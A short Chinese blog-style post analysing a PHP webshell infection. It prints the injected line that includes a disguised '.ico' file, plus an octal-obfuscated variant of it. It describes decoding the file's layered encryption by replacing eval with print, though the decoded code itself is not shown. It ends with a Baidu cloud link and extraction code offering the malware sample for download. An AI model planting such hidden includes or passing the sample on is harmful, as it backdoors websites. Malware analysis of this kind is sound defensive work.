# 第一步 获取ico文件,其实就是个php文件
一般是php 文件被加入
<?php
@include ".2a35bf57.ico";
这一行代码 ,这个代码也是被加密的,如下
/*e05a0*/
//@include "\104:/\167ww\057fz\145rp\056ne\164/.\14653\141fa\061d.\151co";
/*e05a0*/
# 第二步 这个ico文件也是加密的,最后一个eval 函数,改为print,运行php文件又出现 被加密的php代码,如下。
修改后的文件如下
执行后的php代码如下:
很用心的黑客,又把代码加密了一次,另存成php文件后,再继续执行php文件。
# 获取最终的代码如下。
这个代码还算完整,就是被混淆了,基本上能看懂了,绝对是php高手写的代码。
有兴趣的朋友可以来这里分析挂马的程序。
链接:https://pan.baidu.com/s/1zkWEStTt17BwWofXzHDQrg
提取码:7b54
复制这段内容后打开百度网盘手机App,操作更方便哦